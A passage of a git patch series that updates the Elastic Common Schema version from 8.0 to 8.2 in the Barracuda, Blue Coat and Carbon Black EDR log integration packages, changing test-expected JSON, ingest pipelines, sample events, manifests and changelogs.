"ingested": "2022-01-25T11:58:06.417939127Z" @@ -674,7 +674,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417940042Z" @@ -686,7 +686,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417940940Z" @@ -698,7 +698,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417941858Z" @@ -710,7 +710,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417942773Z" @@ -722,7 +722,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417943672Z" @@ -734,7 +734,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417944596Z" @@ -746,7 +746,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417945487Z" @@ -758,7 +758,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417946428Z" @@ -770,7 +770,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417947361Z" @@ -782,7 +782,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417948270Z" @@ -794,7 +794,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417949183Z" @@ -806,7 +806,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417950084Z" @@ -818,7 +818,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417950998Z" @@ -830,7 +830,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417951917Z" @@ -842,7 +842,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417952819Z" @@ -854,7 +854,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417953730Z" @@ -866,7 +866,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417954629Z" @@ -878,7 +878,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417955534Z" @@ -890,7 +890,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417956683Z" @@ -902,7 +902,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417957611Z" @@ -914,7 +914,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417958612Z" @@ -926,7 +926,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417959543Z" @@ -938,7 +938,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417960449Z" @@ -950,7 +950,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417961358Z" @@ -962,7 +962,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417962267Z" @@ -974,7 +974,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417963173Z" @@ -986,7 +986,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.417964108Z" @@ -998,7 +998,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418011880Z" @@ -1010,7 +1010,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418014582Z" @@ -1022,7 +1022,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418015832Z" @@ -1034,7 +1034,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418016924Z" @@ -1046,7 +1046,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418017868Z" @@ -1058,7 +1058,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418018819Z" @@ -1070,7 +1070,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418019742Z" @@ -1082,7 +1082,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418020760Z" @@ -1094,7 +1094,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418021692Z" @@ -1106,7 +1106,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418022643Z" @@ -1118,7 +1118,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418023569Z" @@ -1130,7 +1130,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418024577Z" @@ -1142,7 +1142,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418025514Z" @@ -1154,7 +1154,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418026469Z" @@ -1166,7 +1166,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418027479Z" @@ -1178,7 +1178,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418028418Z" @@ -1190,7 +1190,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T11:58:06.418029350Z" diff --git a/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml b/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml index ce3b0184ae7..198cbbc750f 100644 --- a/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml +++ b/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml @@ -8,7 +8,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # User agent - user_agent: field: user_agent.original diff --git a/packages/barracuda/data_stream/waf/sample_event.json b/packages/barracuda/data_stream/waf/sample_event.json index 79ce22ce855..f4cbf73f8f6 100644 --- a/packages/barracuda/data_stream/waf/sample_event.json +++ b/packages/barracuda/data_stream/waf/sample_event.json @@ -13,12 +13,12 @@ "type": "logs" }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", "snapshot": true, - "version": "8.0.0" + "version": "8.2.0" }, "event": { "agent_id_status": "verified", diff --git a/packages/barracuda/manifest.yml b/packages/barracuda/manifest.yml index ff5df0d02b6..cd02944de3d 100644 --- a/packages/barracuda/manifest.yml +++ b/packages/barracuda/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: barracuda title: Barracuda Logs -version: 0.8.0 +version: 0.9.0 description: Collect spam and web application firewall logs from Barracuda devices with Elastic Agent. categories: ["network", "security"] release: experimental From cc7c89b6eeb0bf166ca7b296feb29a956150405a Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 13:21:27 -0600 Subject: [PATCH 08/23] Update bluecoat to ECS 8.2 --- packages/bluecoat/_dev/build/build.yml | 2 +- packages/bluecoat/changelog.yml | 5 + .../pipeline/test-generated.log-expected.json | 200 +++++++++--------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/director/sample_event.json | 2 +- packages/bluecoat/manifest.yml | 2 +- 6 files changed, 109 insertions(+), 104 deletions(-) diff --git a/packages/bluecoat/_dev/build/build.yml b/packages/bluecoat/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/bluecoat/_dev/build/build.yml +++ b/packages/bluecoat/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/bluecoat/changelog.yml b/packages/bluecoat/changelog.yml index 06c2468cd78..3f2ca444b74 100644 --- a/packages/bluecoat/changelog.yml +++ b/packages/bluecoat/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.8.0" + changes: + - description: Update to ECS 8.2.0 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "0.7.0" changes: - description: Update to ECS 8.0.0 diff --git a/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json b/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json index 88b437011b0..bd21cd730d3 100644 --- a/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json @@ -2,7 +2,7 @@ "expected": [ { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728249781Z" @@ -14,7 +14,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728256159Z" @@ -26,7 +26,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728257323Z" @@ -38,7 +38,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728258427Z" @@ -50,7 +50,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728259453Z" @@ -62,7 +62,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728260480Z" @@ -74,7 +74,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728261505Z" @@ -86,7 +86,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728262584Z" @@ -98,7 +98,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728263621Z" @@ -110,7 +110,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728264636Z" @@ -122,7 +122,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728265649Z" @@ -134,7 +134,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728266832Z" @@ -146,7 +146,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728267854Z" @@ -158,7 +158,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728268868Z" @@ -170,7 +170,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728269879Z" @@ -182,7 +182,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728270901Z" @@ -194,7 +194,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728272036Z" @@ -206,7 +206,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728273053Z" @@ -218,7 +218,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728274069Z" @@ -230,7 +230,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728275081Z" @@ -242,7 +242,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728276095Z" @@ -254,7 +254,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728277109Z" @@ -266,7 +266,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728278125Z" @@ -278,7 +278,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728279251Z" @@ -290,7 +290,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728280270Z" @@ -302,7 +302,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728281301Z" @@ -314,7 +314,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728282378Z" @@ -326,7 +326,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728283393Z" @@ -338,7 +338,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728284404Z" @@ -350,7 +350,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728285417Z" @@ -362,7 +362,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728286428Z" @@ -374,7 +374,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728287441Z" @@ -386,7 +386,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728288449Z" @@ -398,7 +398,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728289465Z" @@ -410,7 +410,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728290614Z" @@ -422,7 +422,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728291646Z" @@ -434,7 +434,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728292656Z" @@ -446,7 +446,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728293669Z" @@ -458,7 +458,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728294680Z" @@ -470,7 +470,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728295695Z" @@ -482,7 +482,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728296707Z" @@ -494,7 +494,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728297720Z" @@ -506,7 +506,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728298730Z" @@ -518,7 +518,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728299740Z" @@ -530,7 +530,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728300759Z" @@ -542,7 +542,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728301773Z" @@ -554,7 +554,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728302854Z" @@ -566,7 +566,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728303864Z" @@ -578,7 +578,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728304874Z" @@ -590,7 +590,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728305882Z" @@ -602,7 +602,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728306991Z" @@ -614,7 +614,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728308006Z" @@ -626,7 +626,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728309020Z" @@ -638,7 +638,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728310051Z" @@ -650,7 +650,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728311079Z" @@ -662,7 +662,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728312091Z" @@ -674,7 +674,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728313111Z" @@ -686,7 +686,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728314122Z" @@ -698,7 +698,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728315142Z" @@ -710,7 +710,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728316161Z" @@ -722,7 +722,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728317174Z" @@ -734,7 +734,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728318190Z" @@ -746,7 +746,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728319199Z" @@ -758,7 +758,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728320212Z" @@ -770,7 +770,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728321243Z" @@ -782,7 +782,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728322250Z" @@ -794,7 +794,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728323319Z" @@ -806,7 +806,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728324333Z" @@ -818,7 +818,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728325347Z" @@ -830,7 +830,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728326368Z" @@ -842,7 +842,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728327419Z" @@ -854,7 +854,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728328474Z" @@ -866,7 +866,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728329505Z" @@ -878,7 +878,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728330532Z" @@ -890,7 +890,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728331697Z" @@ -902,7 +902,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728332742Z" @@ -914,7 +914,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728333765Z" @@ -926,7 +926,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728334775Z" @@ -938,7 +938,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728335819Z" @@ -950,7 +950,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728336835Z" @@ -962,7 +962,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728337844Z" @@ -974,7 +974,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728338852Z" @@ -986,7 +986,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728339867Z" @@ -998,7 +998,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728340895Z" @@ -1010,7 +1010,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728341902Z" @@ -1022,7 +1022,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728342980Z" @@ -1034,7 +1034,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728343991Z" @@ -1046,7 +1046,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728345003Z" @@ -1058,7 +1058,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728346014Z" @@ -1070,7 +1070,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728347054Z" @@ -1082,7 +1082,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728348065Z" @@ -1094,7 +1094,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728349078Z" @@ -1106,7 +1106,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728350087Z" @@ -1118,7 +1118,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728351111Z" @@ -1130,7 +1130,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728352127Z" @@ -1142,7 +1142,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728353159Z" @@ -1154,7 +1154,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728354179Z" @@ -1166,7 +1166,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728355187Z" @@ -1178,7 +1178,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728356196Z" @@ -1190,7 +1190,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:01:11.728357211Z" diff --git a/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml b/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml index 6b0ef5c6bec..939ce13fe60 100644 --- a/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml +++ b/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml @@ -8,7 +8,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # User agent - user_agent: field: user_agent.original diff --git a/packages/bluecoat/data_stream/director/sample_event.json b/packages/bluecoat/data_stream/director/sample_event.json index 5f65ce897fa..81ada87244c 100644 --- a/packages/bluecoat/data_stream/director/sample_event.json +++ b/packages/bluecoat/data_stream/director/sample_event.json @@ -13,7 +13,7 @@ "type": "logs" }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", diff --git a/packages/bluecoat/manifest.yml b/packages/bluecoat/manifest.yml index 56780d6fe06..0b4d290b782 100644 --- a/packages/bluecoat/manifest.yml +++ b/packages/bluecoat/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: bluecoat title: Blue Coat Director Logs -version: 0.7.0 +version: 0.8.0 description: Collect director logs from Blue Coat devices with Elastic Agent. categories: ["network", "security"] release: experimental From 56172ec68586354295dc90250555f62bc492cbc1 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 13:31:22 -0600 Subject: [PATCH 09/23] Update carbonblack_edr to ECS 8.2 --- packages/carbonblack_edr/_dev/build/build.yml | 2 +- packages/carbonblack_edr/changelog.yml | 5 + .../pipeline/test-events.json-expected.json | 198 +++++++++--------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/log/sample_event.json | 2 +- packages/carbonblack_edr/docs/README.md | 2 +- packages/carbonblack_edr/manifest.yml | 2 +- 7 files changed, 109 insertions(+), 104 deletions(-) diff --git a/packages/carbonblack_edr/_dev/build/build.yml b/packages/carbonblack_edr/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/carbonblack_edr/_dev/build/build.yml +++ b/packages/carbonblack_edr/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/carbonblack_edr/changelog.yml b/packages/carbonblack_edr/changelog.yml index 7c98f1f327d..3a67be50db0 100644 --- a/packages/carbonblack_edr/changelog.yml +++ b/packages/carbonblack_edr/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "1.1.0" changes: - description: Update to ECS 8.0 diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json index b2f426d6c6d..fbd1747776d 100644 --- a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json +++ b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json @@ -15,7 +15,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -54,7 +54,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -91,7 +91,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -130,7 +130,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -169,7 +169,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.group.observed", @@ -206,7 +206,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "binaryinfo.observed", @@ -245,7 +245,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": 